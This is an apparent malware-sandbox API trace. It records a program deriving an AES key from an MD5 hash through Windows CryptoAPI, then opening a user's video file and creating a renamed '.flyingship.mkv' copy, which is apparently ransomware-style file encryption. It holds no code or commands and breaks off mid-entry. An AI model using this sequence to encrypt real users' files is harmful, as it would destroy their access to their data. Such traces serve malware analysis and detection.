[0192.098] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0192.098] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.098] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0192.100] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.107] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.107] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0192.107] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.107] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.107] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.107] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.107] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.107] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0192.107] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.107] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.107] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.107] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.107] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.107] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.108] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0192.108] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.108] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.108] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0192.108] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.108] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.108] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0192.108] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.108] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.108] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0192.108] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.108] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.108] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.108] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.108] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.108] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.108] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.108] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0192.108] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.108] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.108] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0192.108] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.109] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.109] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.109] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.109] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0192.109] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.109] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.109] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.109] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.109] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.109] CryptHashData (hHash=0x90af58, pbData=0x8dee70, dwDataLen=0x19, dwFlags=0x1) returned 1 [0192.109] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.109] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0192.109] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.109] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.109] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.109] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0192.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0192.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.110] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.110] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.110] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0192.110] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.110] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90afd8 | out: hHeap=0x8a0000) returned 1 [0192.110] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.110] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.110] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.110] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0192.110] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0192.110] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.110] CryptDestroyHash (hHash=0x90af58) returned 1 [0192.111] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.111] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.111] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0192.111] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0192.111] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.111] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0ntyy6p\\axsaypuzrscymoeip6.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0192.112] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.112] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0192.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0192.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0192.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0192.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0192.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0192.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0192.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0192.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0192.113] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0192.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0192.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0192.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0192.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0192.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0192.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0192.113] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0192.113] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0192.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0192.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0192.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0192.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0192.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0192.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0192.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0192.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0192.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0192.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0192.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0192.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0192.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0192.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0192.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0192.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0192.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0192.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0192.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0192.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0192.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0192.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0192.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0192.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0192.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0192.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0192.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0192.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0192.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0192.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0192.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0192.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5de0 [0192.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0192.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0192.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0192.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0192.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0192.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0192.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0192.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0192.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0192.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0192.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0192.115] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0ntyy6p")) returned 0x10 [0192.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0192.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0192.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0192.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0192.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0192.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0192.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0192.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0192.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0192.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0192.117] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.flyingship.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0ntyy6p\\axsaypuzrscymoeip6.flyingship.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0192.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0192.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0192.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0192.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0192.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0192.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0192.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0192.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0192.118] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0192.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0192.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0192.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0192.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0192.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0192.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0192.118] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0192.118] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0192.119] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0192.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0192.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0192.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0192.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0192.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0192.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0192.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0192.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0192.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0192.119] 